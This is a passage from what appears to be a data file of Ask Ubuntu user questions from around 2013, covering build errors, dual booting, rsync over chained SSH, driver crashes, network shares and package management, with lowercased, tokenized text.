‘byte_re_match_2_internal’ : ../.././libiberty/regex.c:7426:11 : warning : incompatible implicit declaration of built-in function ‘abort’ [ enabled by default ] ../.././libiberty/regex.c : in function ‘xregcomp’ : ../.././libiberty/regex.c:7980:4 : warning : incompatible implicit declaration of built-in function ‘free’ [ enabled by default ] ../.././libiberty/regex.c : in function ‘xregexec’ : ../.././libiberty/regex.c:8055:7 : warning : incompatible implicit declaration of built-in function ‘free’ [ enabled by default ] ../.././libiberty/regex.c : in function ‘xregerror’ : ../.././libiberty/regex.c:8083:5 : warning : incompatible implicit declaration of built-in function ‘abort’ [ enabled by default ] ../.././libiberty/regex.c : in function ‘xregfree’ : ../.././libiberty/regex.c:8116:3 : warning : incompatible implicit declaration of built-in function ‘free’ [ enabled by default ] make [ 3 ] : *** [ regex.o ] error 1 make [ 3 ] : leaving directory `/home/me/downloads/gcc-4.8.0/host-i686-pc-linux-gnu/libiberty' make [ 2 ] : *** [ all-stage1-libiberty ] error 2 make [ 2 ] : leaving directory `/home/me/downloads/gcc-4.8.0' make [ 1 ] : *** [ stage1-bubble ] error 2 make [ 1 ] : leaving directory `/home/me/downloads/gcc-4.8.0' make : *** [ all ] error 2 update : i found the following error log in build-dir/host-i686-pc-linux-gnu/libiberty/config.log $ more ./host-i686-pc-linux-gnu/libiberty/config.log this file contains any messages produced by compilers while running configure , to aid debugging if configure makes a mistake . it was created by configure , which was generated by gnu autoconf 2.64 . invocation command line was $ /home/me/downloads/gcc-4.8.0/libiberty/configure -- cache-file=./config.cache -- prefix /usr/local/stow/gcc-4.8.0/ -- enable-languages=c , c++ , fortran , java , lto , objc -- program-tr ansform-name=s , y , y , -- disable-option-checking -- build=i686-pc-linux-gnu -- host=i686-pc-linux-gnu -- target=i686-pc-linux-gnu -- srcdir=../.././libiberty -- disable-intermodule -- enable-c hecking=yes , types -- disable-coverage -- enable-languages=c , c++ , lto -- enable-shared # # -- -- -- -- - # # # # platform . # # # # -- -- -- -- - # # hostname = ubuntu uname -m = i686 uname -r = 3.5.0-26-generic uname -s = linux uname -v = # 42~precise1-ubuntu smp mon mar 11 22:19:42 utc 2013 /usr/bin/uname -p = unknown /bin/uname -x = unknown /bin/arch = unknown /usr/bin/arch -k = unknown /usr/convex/getsysinfo = unknown /usr/bin/hostinfo = unknown /bin/machine = unknown /usr/bin/oslevel = unknown /bin/universe = unknown path : /usr/lib/lightdm/lightdm path : /usr/local/sbin path : /usr/local/bin path : /usr/sbin path : /usr/bin path : /sbin path : /bin path : /usr/games # # -- -- -- -- -- - # # # # core tests . # # # # -- -- -- -- -- - # # configure:2223 : creating cache ./config.cache configure:2374 : checking whether to enable maintainer-specific portions of makefiles configure:2384 : result : no configure:2399 : checking for makeinfo configure:2426 : result : makeinfo -- split-size=5000000 -- split-size=5000000 configure:2466 : checking for perl configure:2482 : found /usr/bin/perl configure:2493 : result : perl configure:2512 : checking build system type configure:2526 : result : i686-pc-linux-gnu configure:2546 : checking host system type configure:2559 : result : i686-pc-linux-gnu configure:2584 : checking for i686-pc-linux-gnu-ar configure:2611 : result : ar configure:2676 : checking for i686-pc-linux-gnu-ranlib configure:2703 : result : ranlib configure:2796 : checking for i686-pc-linux-gnu-gcc configure:2823 : result : gcc configure:3092 : checking for c compiler version configure:3101 : gcc -- version > & 5 gcc ( gcc ) 4.7.2 copyright ( c ) 2012 free software foundation , inc . this is free software ; see the source for copying conditions . there is no warranty ; not even for merchantability or fitness for a particular purpose . configure:3112 : $ ? = 0 configure:3101 : gcc -v > & 5 using built-in specs . collect_gcc=gcc collect_lto_wrapper=/usr/local/stow/gcc-4.7.2/libexec/gcc/i686-pc-linux-gnu/4.7.2/lto-wrapper target : i686-pc-linux-gnu configured with : ./configure -- prefix=/usr/local/stow/gcc-4.7.2/ thread model : posix gcc version 4.7.2 ( gcc ) configure:3112 : $ ? = 0 configure:3101 : gcc -v > & 5 gcc : error : unrecognized command line option '-v' gcc : fatal error : no input files compilation terminated . configure:3112 : $ ? = 1 configure:3101 : gcc -qversion > & 5 gcc : error : unrecognized command line option '-qversion' gcc : fatal error : no input files compilation terminated . configure:3112 : $ ? = 1 configure:3128 : gcc -o conftest -g -static-libstdc++ -static-libgcc conftest.c > & 5 configure:3131 : $ ? = 0 configure:3160 : checking for c compiler default output file name configure:3182 : gcc -g -static-libstdc++ -static-libgcc conftest.c > & 5 configure:3186 : $ ? = 0 configure:3223 : result : a.out configure:3239 : checking whether the c compiler works configure:3248 : ./a.out configure:3252 : $ ? = 0 configure:3267 : result : yes configure:3274 : checking whether we are cross compiling configure:3276 : result : no configure:3279 : checking for suffix of executables configure:3286 : gcc -o conftest -g -static-libstdc++ -static-libgcc conftest.c > & 5 configure:3290 : $ ? = 0 configure:3312 : result : configure:3319 : checking for suffix of object files configure:3341 : gcc -c -g conftest.c > & 5 configure:3345 : $ ? = 0 configure:3366 : result : o configure:3370 : checking whether we are using the gnu c compiler configure:3389 : gcc -c -g conftest.c > & 5 configure:3389 : $ ? = 0 configure:3398 : result : yes configure:3407 : checking whether gcc accepts -g configure:3427 : gcc -c -g conftest.c > & 5 configure:3427 : $ ? = 0 configure:3468 : result : yes configure:3485 : checking for gcc option to accept iso c89 configure:3549 : gcc -c -g conftest.c > & 5 in file included from /usr/include/features.h:389:0 , from /usr/include/stdio.h:28 , from conftest.c:10 : /usr/include/gnu/stubs.h:7:27 : fatal error : gnu/stubs-32.h : no such file or directory compilation terminated . ... [ the logfile continues with several other errors similar to this . ]
279607	how to rsync between home computer and computer inside another network ?	all the computers i use run ubuntu . to work from home , i ssh from my home computer to my lab computer as follows : # first a port knock is needed joe @ homepc > telnet ssh.university.edu 9000 # next ssh to one of the external ssh servers of university # this logs me into one of many ssh servers serving as interface joe @ homepc > ssh student7 @ ssh.university.edu # finally ssh to my lab pc inside university network student7 @ university999 > ssh joedude @ labpc # and i am in my labpc joedude @ labpc > how do i use rsync to sync a directory on labpc with a directory on my homepc ? also , it would be awesome if there is some way to automate all of this so that i can rsync with just a single command from my homepc .
279609	dual boot with windows 8	i have installed ubuntu 12.10 64-bit alonside windows8 64 bit . after installation i am unable to boot windows 8 . i have tried the dvd repair for windows and it says could n't fix the issue . i have used uefi installation for both ubuntu and windows 8 . i am using a dell vostro 2520 model laptop . help please sudo add-apt : it says the command not found . : (
279610	ps3 media server not opening ?	this is my first time posting on the forums but i 've tried everthing and can not find an answer anywhere . my problm is that i am unable to run ps3 media server ( pms ) on ubuntu 12.10 . i run the 32 bit edition on my laptop . when i try to open pms from the unity menu nothing happens , and when i try to open it from the terminal with the command `` ps3mediaserver '' i get the output : /usr/bin/ps3mediaserver : 34 : exec : /usr/local/java/jdk*/bin/java : not found when i first installed pms it worked wonderfully , but i installed open jdk and open jre to try to get minecraft working and ever since then i 've had this problem . i 've given up on minecraft for now . i assumed that pms did not run with open java and i needed oracle java instead . in my attempts to fix pms i 've purged java using these instructions and uninstalled pms to the best of my ability . i then re-installed java 7 from oracle using these instructions . i then re-installed pms from the ppa using these commands : sudo add-apt-repository ppa : happy-neko/ps3mediaserver sudo apt-get update sudo apt-get install ps3mediaserver pms still did n't work and i got the same output from the terminal . i thought that maybe pms did n't work with java 7 so i and installed java 6 using these instructions . still no luck . does anyone have any ideas ?
279613	laptop and software too old for ubuntu ?	just ran through 1-7 steps on this download and install procedure http : //www.ubuntu.com/download/help/install-ubuntu-with-windows only to fall flat at step 7 . computer , a compaq 6910p laptop running windows xp , throws up a boot manager with only `` windows '' and `` system restore '' as options , no sign of `` ubuntu '' . is my laptop and software too old for all this or have i missed something ?
279616	repair a broken hard drive ?	i have a newer toshiba hard drive with bad sectors ... i do n't hear anything loose , so i think maybe there is just a scratch in the disk somewhere ... i heard of products that can `` buff '' out those scratches and restore the hard drive into good condition , but i have yet to find one . is this even possible ?
279617	can i have ubuntu in the same bootable usb stick for windows and mac ?	i would like to have in the same usb 2 partitions one for mac and the other for run ubuntu over windows .
279618	hardware compatibility ?	i am running windows 7 on my hp pavilion g6-1225sm ( 2nd generation intel core i5-2450m processor 2.4ghz , radeon hd6470m graphics , intel hm65 express chipset ... ) . i am also using focusrite saffire 6 usb ( usb 2.0 ) audio interface . i would like to install ubuntu studio because i like the jack server option for connecting two different audio interfaces to work as one ( if i understood it right ) ... i would like to buy one more audio interface and use it with the one that i already have . the question : is there any version of ubuntu studio compatible with this hardware of mine , and where can i download it ?
279620	how do i upgrade from 12.10 to 13.04 ?	i am using ubuntu 12.10 . please outline the different ways i can upgrade to 13.04 .
279622	unable install cmake and ccmake ?	so the thing is i 'm trying to install cmake and cmake-curses-gui . i have updated the system with apt-get-update . sudo apt-get install cmake reading package lists ... done building dependency tree reading state information ... done package cmake is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'cmake ' has no installation candidate sudo apt-get install cmake-curses-gui reading package lists ... done building dependency tree reading state information ... done e : unable to locate package cmake-curses-gui that 's strange . can anyone give some pointers ? pastbin sources.list : - http : //pastebin.com/dufycyfz
279630	compiling program that requires python 2.6	i 'm trying to compile a software package but it fails with g++ -wall -o0 -fno-strict-aliasing -i/usr/include/python2.6 -i/usr/include/python2.5 -g -pthread -fpic -i../../plot/src -i../../math/src -i../../rclib/src/util -i../../rclib/src/conui -i../../rclib/src/io -i../../_general -i../../clop/src -i../../clop/src/real -i../../clop/src/artificial -i../../clop/src/math -dpthreads -dgui=nogui -drestrict=__restrict__ -dkbhit_unix -dclock_ftime -c -o ../swig/clop_swig_wrap.o ../swig/clop_swig_wrap.cxx ../swig/clop_swig_wrap.cxx:149:20 : fatal error : python.h : no such file or directory compilation terminated . make : *** [ ../swig/clop_swig_wrap.o ] error 1 since python 2.6 is no longer available in synaptic , i downloaded , built , and installed it from http : //www.python.org/download/releases/2.6.8/ , but it did n't add the 2.6 libraries to /usr/include how do i get the python2.6 libraries into /usr/include on ubuntu 12.04 ?
279634	what is the proper way to kill update-manager hung installing the 3.2.0-40 kernel ?	update-manager is hung bringing my 12.04 up to the 3.2.0-40 kernel . the cancel button is greyed out . is it safe and adequate to click the x icon ? if not , what sequence to kill the hierarchy of processes , as listed below . the window says : applying changes configuring linux-image-3.2.0-40-generic-pae details window : setting up linux-image-3.2.0-40-generic-pae ( 3.2.0-40.64 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.2.0-40-generic-pae /boot/vmlinuz-3.2.0-40-generic-pae run-parts : executing /etc/kernel/postinst.d/dkms 3.2.0-40-generic-pae /boot/vmlinuz-3.2.0-40-generic-pae the process hierarchy is : dakra 2623 1 0 12:10 ? 00:00:08 /usr/bin/python /usr/bin/update-manager dakra 2646 2312 0 12:10 ? 00:00:00 /usr/lib/evolution/3.2/evolution-alarm-notify dakra 2663 1 0 12:10 ? 00:00:00 /usr/bin/python /usr/lib/ubuntuone-client/ubuntuone-syncdaemon dakra 2698 2312 0 12:11 ? 00:00:00 update-notifier root 2704 1 0 12:11 ? 00:00:02 /usr/bin/python /usr/sbin/aptd root 2730 1 0 12:11 ? 00:00:00 /usr/bin/python /usr/lib/system-service/system-service-d root 2755 2704 0 12:11 pts/2 00:00:00 /usr/bin/python /usr/sbin/aptd dakra 3011 2623 0 12:12 ? 00:00:00 [ debconf-communi ] root 3420 2755 0 12:12 pts/3 00:00:00 /usr/bin/dpkg -- status-fd 20 -- configure linux-image-3.2.0-40-generic-pae : i386 linux-image-generic-pae : i386 linux-headers-3.2.0-40 : all linux-headers-3.2.0-40-generic-pae : i386 linux-headers-generic-pae : i386 linux-generic-pae : i386 linux-libc-dev : i386 thunderbird : i386 thunderbird-globalmenu : i386 thunderbird-locale-en : i386 thunderbird-gnome-support : i386 thunderbird-locale-en-us : all root 3421 3420 0 12:12 pts/3 00:00:00 /usr/bin/perl /var/lib/dpkg/info/linux-image-3.2.0-40-generic-pae.postinst configure root 3445 3421 0 12:12 pts/3 00:00:00 run-parts -- verbose -- exit-on-error -- arg=3.2.0-40-generic-pae -- arg=/boot/vmlinuz-3.2.0-40-generic-pae /etc/kernel/postinst.d root 3474 3445 0 12:12 pts/3 00:00:00 /bin/sh /usr/lib/dkms/dkms_autoinstaller start 3.2.0-40-generic-pae root 3476 3474 0 12:12 pts/3 00:00:00 /bin/bash /usr/sbin/dkms autoinstall -- kernelver 3.2.0-40-generic-pae root 4228 3476 0 12:12 pts/3 00:00:00 /bin/bash /usr/sbin/dkms autoinstall -- kernelver 3.2.0-40-generic-pae dakra 4869 2312 0 12:12 ? 00:00:00 /usr/lib/deja-dup/deja-dup/deja-dup-monitor root 7485 4228 0 12:12 pts/3 00:00:00 /bin/bash /usr/sbin/dkms autoinstall -- kernelver 3.2.0-40-generic-pae root 7487 7485 99 12:12 pts/3 00:22:56 /sbin/depmod -a 3.2.0-40-generic-pae -f /boot/system.map-3.2.0-40-generic-pae
279636	how to get rid of 'picture cd ' label for hard drives	i have 3 ntfs drives in my computer . one of them is displayed ok in file manager , i.e . file manager shows only folders and files therein . but with the other two ubuntu file manager ( files ) keeps adding blue strip ( label ) to the top of the window saying 'picture cd ' and a button to start shotwell on the same strip . is it possible to get rid of the label and the button ? ( see attached screenshots )
279637	can not view file on other ubuntu machine with nautilus	i followed the nautilus share directions and created directories in both my machines . i allowed sharing as per the documentation and checked both boxes . but i still could not view any files in the other computers directory . i made sure to check view hidden files . do i have to establish an lan ? is this the problem . or do you mean by a lan an computer running under the same router ? i know that with windows 7 i can `` see '' the files in the other computer 's directory . is it the same with ubuntu ? that is once you follow the directions as per above that 's all that 's necessary ? this is the url i followed : https : //help.ubuntu.com/10.04/internet/c/networking-shares.html specifically the section using nautilus : sharing folders via the shared folders application to share folders using the shared folders application : press applications â accessories â terminal to open a terminal . type shares-admin and press enter to open shared folders . you may receive a message which says sharing services are not installed . if this happens , ensure that the two checkboxes in the message box are checked and press install services . sharing service support will then be downloaded and installed ; this may take a while . press the button and enter your password in the password field . press the authenticate button . select the shared folders tab and press add . select the location of the folder you wish to share by changing the path option . choose windows networks ( smb ) from the share through option . enter a name and comment for the shared folder . if you would like people accessing the shared folder to be able to add , change and remove files in the folder , uncheck read only . if you leave read only checked , people will only be able to view files in the folder . press share to make the shared folder available . other people on the same network ( lan ) as you should now be able to access the folder . ifconfig on my laptop : tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 memory : f0600000-f0620000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2751 errors:0 dropped:0 overruns:0 frame:0 tx packets:2751 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:697626 ( 697.6 kb ) tx bytes:697626 ( 697.6 kb ) wlan0 link encap : ethernet hwaddr 00:18 : de:2d:97:83 inet addr:192.168.1.64 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :218 : deff : fe2d:9783/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:31608 errors:0 dropped:0 overruns:0 frame:0 tx packets:19873 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:37830265 ( 37.8 mb ) tx bytes:2468036 ( 2.4 mb ) netstat -nr on my laptop kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.1.254 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0 unfortunately i 'm having difficulty mounting my external drive on my desktop to get the same info off of it .
279640	ubuntu on asus f201e	my grandpa just bought a new netbook , the asus f201e , shipped with windows 8 : ( after 5 minutes he said `` i do n't want this crap '' and so i ow try to install ubuntu 12.10 64bit there . have the iso copied ( unetbootin ) on my stick and booted , got the dialog wether to install or try ubuntu . no matter what i choose , i just get a black screen and nothing happens . i deactivated fastboot in bios but still used ( u ) efi as my grandpa wants the ability to run both . what do i have to do ? is n't the f201e sometimes shipped with ubuntu ? how comes i ca n't install ?
279641	nautilus dual monitor issue	i am using ubuntu 12.04 and 2 monitors . my left monitor is the laptop screen and the right monitor is an external monitor . whenever i open a nautilus window in my right ( external ) monitor and double click on some folder , it automatically moves the nautilus window to my left ( laptop ) monitor . this only happens on the first double click after opening a nautilus window . any ideas why this is happening . though this is not critical but is an annoying bug . can i change some setting to avoid this behaviour . i wanted to report this as a nautilus bug . but i ca n't figure out how to do it through apport . any help on fixing the issue would be appreciated . thanks . update : when i changed the monitor setup to position my external monitor to the left of my laptop monitor , the same issue gets reproduced but after the first double click the window moves to my external monitor . this makes me conclude that windows manager moves the monitor to the leftmost screen . i have also observed the same behaviour with chromium web browser .
279648	newbie . can not upgrade to 12.04	i am trying to use ubuntu over windows xp on my home computer but have completely fubared it . i first loaded an old disc i had of version 8.xxx . it loaded fine and seemed to be running well . i ran the update function and tried to update the computer to version 10.xxx . with about 15 minutes left in the upgrade process terminal said something was wrong and was exiting , but it never did . i turned the computer off . upon re-boot it tries to load grub with a countdown . if i hit escape before it tries to load grub it takes me to a menu to try different versions of 10.04 . one of the recovery modes seemed to do something like creating a maintenance shell and it gives me a root command line and tells me control d will terminate the shell . is there a command i can type on this line ? other than that the computer will not load anything . it comes up with an error stqating a kernal panic etc etc etc . i have tried all of the options on the 10.04 options screen all with the same result . i made a live cd of 12.04.2 and tried to install it by re-starting the computer with the disc in the drive . ubuntu seems to load because i can see part of the tool bar across the top of the screen and see where the program is asking me if i want to use or intall ubunty , but i only have about 3/4 of my screen and the part that i can see is filled with horizontal lines . i can see the cursor moving because it changes the line pattern on the screen . the screen also seems to be divided vertically into about 4 or 5 segments . i can click on some of the items in the toolbar across the top of the screen , but can not read the menus or the window that the clicks open . is this a graphics card problem ? here are my thoughts . go back and re-load the version 8.xxx and get it running and then see if i can upgrade to the version 12.04 using the live cd from a function computer . can i jump versions or do i need to make my way up the upgrade chain ? if i have to go up the chain can i download the in between versions and burn them to a disc ? anyone else have any ideas to get me back up and running ? thank you in advance .
279652	cryptsetup failed	totally new to ubuntu here , and i decided to give it a go and do a fresh install on my free-dos lenovo e330 . everything went smoothly all the way through the installation , and i decided to add an encryption password to the hard drive . now i 'm in a situation that i just ca n't login to ubuntu . i 'm using the password i created for the encryption but there must have been a mistake . now i ca n't access the system . what could i do to reset the password , or just wipe ubuntu off my ssd ? i have no files there so wiping ubuntu is an option for me .
279655	how can i perform the su command to switch to a network user without a password ?	i have a local user and a network user ( authenticated over ldap ) that i frequently use su to switch to for certain tasks . i 'm wondering how i can avoid typing the password for the network user every time i su . i have attempted to use the solution at how can i switch user without password ? but that solution does not seem to work for me .
279658	how can i run corel draw ?	i have purchased corel draw and i am required to use it for school . can i install this program on my ubuntu system or is my windows machine the only option here ? i do have inkscape and love it but i have a professor that requires corel draw in class . as well , there are other programs that i will be required to use for school in the future , if i can not use corel draw with ubuntu , then is it safe to assume that i wo n't be able to use any of the others with my ubuntu system if a professor insists on one in particular ? thanks for your assistance .
279668	how can i list all packaged installed by me ?	i am trying to clean my installation up a bit , so i decided to clean up my packages a bit . however , i 'm having trouble with that : my wish is to make apt-get list all packages installed by me . if i list every package , i also see the dependencies of my packages although i am not interested in those . for example , i want to see that i installed lightyears but i do not want to see the packages installed alongside , like python-numpy or python-pygame . is there a way to do this ?
279671	how can i use custom wallpapers for the login screen ?	i recently installed 12.10 version and i loved it ! but the there 's something weird with wallpapers . as long as i use a wallpaper from the /usr/share/backgrounds folder ( i use the `` appearance '' dialog box ) , this wallpapers appears also on my welcome ( login ) screen . but when i try to use a wallpaper from my pictures folder ( again using the `` + '' button from the appearance dialog box ) , my login screen has the standard ubuntu 12.10 wallpaper . is there anything i can do to fix this ? thanks in advance !
279672	can i reload monitors.xml without restarting lightdm ?	i was writing myself a short script to turn off my laptops monitor in order to only use the bigger external monitor , as i do n't always want to use unity gui . but after turning the laptop monitor back on with the same script the configurations were all wrong , so i was wondering if there is a way to reload monitors.xml ( from the ./config ) where all the configurations are stored without restarting whole lightdm ? i did this in the current script , and not only killed it all my programs but also did i get an error regarding my keyboard input . about the setting : my left , smaller monitor is my primary and the right one the secondary . but if monitor.xml is not reloaded both are primary monitors . is it probably necessary to restart lightdm ? if so , how can i do that in a as secure as possible way without killing all processes ( if possible of course ) .
279674	nvidia driver crashes compiz	i 've installed nvidia driver from terminal with sudo apt-get install nvidia-current , and after that compiz crashes every time after i log in . can someone tell me how to make it work ? my video card is nvidia gt630m and i also have intel hd graphics 4000 .
279676	fstab mount smbfs share for user noauto asking for password via gui	i 'm trying to do a connection for my work computers d : from my laptop . altough to have direct access to the disk i need to use the computers administrator account . and i would not like to save the password for the administrator account in fstab file on my laptop . # work share //172.16.8.2/d $ /home/user/domain/d smbfs username=administrator , domain=domain , user , rw , noauto 0 0 this is how it looks in the terminal $ mount ~/npn/d password : and i get the thing mounted in no time . now to the trouble : if i try to `` click '' the d `` drive '' in the file browser i 'm met by this error box : unable to mount d password : mount error ( 13 ) : permission denied refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) logic , because the graphical interface ca n't throw me a password login promt like the terminal . is there any way for me to solve this problem , to just be able to `` click '' on the unmounted d drive and get a gui passpromt thrown ?
279678	ubuntu 12.04 unresponsive after sleep	i am running ubuntu 12.04 with gnome classic . when i leave my computer for a few minutes the screen goes dark and after i wake it up all i get is black screen and mouse . that happens every time and i cant find a solution . i tried searching everywhere for a solution without any success and i am getting desperate as i do n't want to change my environment .
279679	intermittent keyboard and mouse failure on boot up	i have found several posts similar to mine , but this is the closest matching one to my specific issue : usb keyboard works occasionally . i am not sure if the answer given there would work for me , because i did n't entirely understand what needed to be done . i 'm still new to linux . -- -- -- -- -- the issue in short : i have a laptop where the mouse and keyboard both fail to function once it has booted into ubuntu . this has been happening since day one ( initial ubuntu install ) , but it used to be a rare occurrence . now ( for the last few weeks ) , it has gotten worse , moving from happening once every ~20 boot ups , to easily happening 30 boot ups in a row . -- -- -- -- -- machine details : i 'm using a toshiba satellite l875d-s7230 . the default windows 7 install has been untouched , but the partition has been scaled to make room for ubuntu . i have an up to date install of ubuntu 12.10 , setup to duel boot with the default win7 install . the linux wifi driver had to be compiled and installed manually . ( whole different issue ) i am using the proprietary video card driver that came pre-installed with ubuntu . hibernation is disabled to prevent the computer from locking up . ( a common problem i 've read ) . the computer ca n't reboot properly , i have to always shut it down . ( not an issue i 'm concerned with right now ) -- -- -- -- -- problem details : the built in keyboard and mouse both fail when ubuntu loads . the failure seems to be instant , as i do not have the ability to move the mouse or type any keys from the moment i see a cursor appear on screen . the keyboard does n't respond in any way . pressing num-lock , scroll-lock , or caps-lock does not make any of the indicator lights turn on . the only button on the laptop that seems to do anything is the power button , which allows me to hard boot the machine . the only usb device i own to assist in troubleshooting is a mouse . luckily , it has worked every time i plug it in . it has never failed , and is currently the only way i can turn off the laptop without hard booting it . i only plug in the mouse when the built in mouse and keyboard fail . the mouse and keyboard both work perfectly under win7 , and the keyboard works perfectly when grub loads . the failure only happens when i select ubuntu and the os begins to load . if anybody can help i would greatly appreciate it . i 'm not sure what the issue could be , and my laptop is almost unusable at present .
279681	the `` new file '' option in files context menu is missing	i am using release 12.10 ( quantal ) 64-bit with gnome 3.6.0 and files 3.6.3 when i right click an empty space i can see the options : new folder , restore missing files ... , ubuntu one , paste and properties . there is no option to create a new file . how can i add that option ?
279682	gnome 3 and discrete only nvidia	long ago i 've installed gnome 3 over ubuntu 12.10 currently i 'm working on a scientific project , that requires lot of graphical work . i 'd like notebook to run nvidia gpu only . so i disabled nvidia optimus in bios and switched to use discrete videocard . but now gnome 3 is not loading . it stucks at blue scree . what can i do ? i also was unable to install nvidia drivers . i 'm working on thinkpad w520 with quadro k2000m . if there 's a manual on how to install nvidia drivers - it would be cool .
279686	how to package a simple bash script	the below bash script was written in ~10 sec , but packaging it would take me hours of skimming through big walls of text so i ask my self if there is an easy way out there that i do n't know about . # ! /usr/bin/env bash echo `` hello world '' here a complete little how to , following stef 's linked answer : first we need to install these packages : sudo apt-get install dh-make devscripts copy the above script into an editor and save it as hello file chmod u+x hello mkdir hello-0.1 cp hello hello-0.1/ cd hello-0.1/ dh_make -s -- indep -- createorig grep -v makefile debian/rules > debian/rules.new mv debian/rules.new debian/rules echo hello usr/bin > debian/install echo `` 1.0 '' > debian/source/format rm debian/*.ex debuild -us -uc cd .. sudo dpkg -i hello_0.1-1_all.deb now entering hello into the terminal prints 'hello world ' .
279689	how do you interpret the lsusb output ?	i was wondering can anyone tell me what does the lsusb output means ? example dodohjk @ dodohjk-pc : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 0c45:62c0 microdia sonix usb 2.0 camera bus # # # ? device # # # ? linux fundation # . # ? root hub ? and also the lsusb -t command ? dodohjk @ dodohjk-compaq-presario-cq60-notebook-pc : ~ $ lsusb -t / : bus 04.port 1 : dev 1 , class=root_hub , driver=ohci_hcd/4p , 12m / : bus 03.port 1 : dev 1 , class=root_hub , driver=ohci_hcd/3p , 12m / : bus 02.port 1 : dev 1 , class=root_hub , driver=ehci_hcd/4p , 480m |__ port 1 : dev 3 , if 0 , class=stor. , driver=usb-storage , 480m |__ port 2 : dev 2 , if 0 , class='binterfaceclass 0x0e not yet handled ' , driver=uvcvideo , 480m |__ port 2 : dev 2 , if 1 , class='binterfaceclass 0x0e not yet handled ' , driver=uvcvideo , 480m / : bus 01.port 1 : dev 1 , class=root_hub , driver=ehci_hcd/3p , 480m especially curious about driver= blabla /4p and the last number 12m thanks
279691	ps error /proc must be mounted - but works as root	this is an openvz vps box . for example : $ ps error : /proc must be mounted to mount /proc at boot you need an /etc/fstab line like : /proc /proc proc defaults in the meantime , run `` mount /proc /proc -t proc '' $ sudo ps [ sudo ] password for ... . : pid tty time cmd 4699 pts/2 00:00:00 sudo 4700 pts/2 00:00:00 ps its only started recently ( possibly since an apt-get upgrade ) . i also ran locale-gen recently , but i do n't see how that would affect things . uname -a linux stormvz1 2.6.32-042stab072.10 # 1 smp wed jan 16 18:54:05 msk 2013 x86_64 x86_64 x86_64 gnu/linux cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.2 lts '' updated tried changing /proc , but did not help : $ ls -ld /proc dr-xr-xr-x 98 root root 0 apr 9 20:11 /proc $ sudo chmod 755 /proc [ sudo ] password for ... . : $ ls -ld /proc drwxr-xr-x 98 root root 0 apr 9 20:11 /proc $ ps error : /proc must be mounted have also done several reboots - largely seems ok , but just this 'glitch' proc is in fstab , but seems ok : grep proc /etc/fstab proc /proc proc defaults 0 0 the files in /proc look like this - which seem ok to my untrained eye : $ sudo ls -la /proc [ sudo ] password for kimptoc : total 4 drwxr-xr-x 105 root root 0 apr 9 20:11 . drwxr-xr-x 22 root root 4096 mar 4 19:18 .. dr-xr-xr-x 6 root root 0 apr 9 20:11 1 dr-xr-xr-x 6 root root 0 apr 9 20:11 108 dr-xr-xr-x 6 postfix postfix 0 apr 11 02:06 12337 dr-xr-xr-x 6 root root 0 apr 9 20:11 139 dr-xr-xr-x 6 root root 0 apr 9 20:11 140 dr-xr-xr-x 6 root root 0 apr 9 20:11 173 dr-xr-xr-x 6 root root 0 apr 9 20:11 2 dr-xr-xr-x 6 www-data www-data 0 apr 9 21:02 2184 dr-xr-xr-x 6 root root 0 apr 9 20:11 251 dr-xr-xr-x 6 root root 0 apr 9 20:11 285 dr-xr-xr-x 6 root root 0 apr 9 20:11 3 dr-xr-xr-x 6 postfix postfix 0 apr 11 07:20 30162 dr-xr-xr-x 6 root root 0 apr 11 07:20 30784 dr-xr-xr-x 6 postfix postfix 0 apr 11 07:20 30825 dr-xr-xr-x 6 postfix postfix 0 apr 11 07:20 30827 dr-xr-xr-x 6 postfix postfix 0 apr 11 07:20 30831 dr-xr-xr-x 6 kimptoc kimptoc 0 apr 11 07:20 30844 dr-xr-xr-x 6 kimptoc kimptoc 0 apr 11 07:20 30845 dr-xr-xr-x 6 root kimptoc 0 apr 11 07:20 30907 dr-xr-xr-x 6 root root 0 apr 11 07:20 30908 dr-xr-xr-x 6 root root 0 apr 9 20:11 315 dr-xr-xr-x 6 root root 0 apr 9 20:11 317 dr-xr-xr-x 6 syslog syslog 0 apr 9 20:11 401 dr-xr-xr-x 6 bind bind 0 apr 9 20:11 419 dr-xr-xr-x 6 root root 0 apr 9 20:11 527 dr-xr-xr-x 6 postfix postfix 0 apr 9 20:11 531 dr-xr-xr-x 6 mongodb nogroup 0 apr 9 22:10 5372 dr-xr-xr-x 6 root root 0 apr 9 20:11 557 dr-xr-xr-x 6 root root 0 apr 9 20:11 559 dr-xr-xr-x 6 root root 0 apr 9 20:11 663 dr-xr-xr-x 6 www-data www-data 0 apr 9 20:11 667 dr-xr-xr-x 6 root root 0 apr 9 20:11 86 -r-xr-xr -- 1 root root 0 apr 11 07:20 cgroups -r-xr-xr -- 1 root root 0 apr 11 07:20 cmdline -r-xr-xr -- 1 root root 0 apr 11 07:20 cpuinfo -r-xr-xr -- 1 root root 0 apr 11 07:20 devices -r-xr-xr -- 1 root root 0 apr 11 07:20 fairsched -r-xr-xr -- 1 root root 0 apr 11 07:20 fairsched2 -r-xr-xr -- 1 root root 0 apr 11 07:20 filesystems dr-xr-xr -- 3 root root 0 apr 11 07:20 fs -r -- -- -- -- 1 root root 0 apr 11 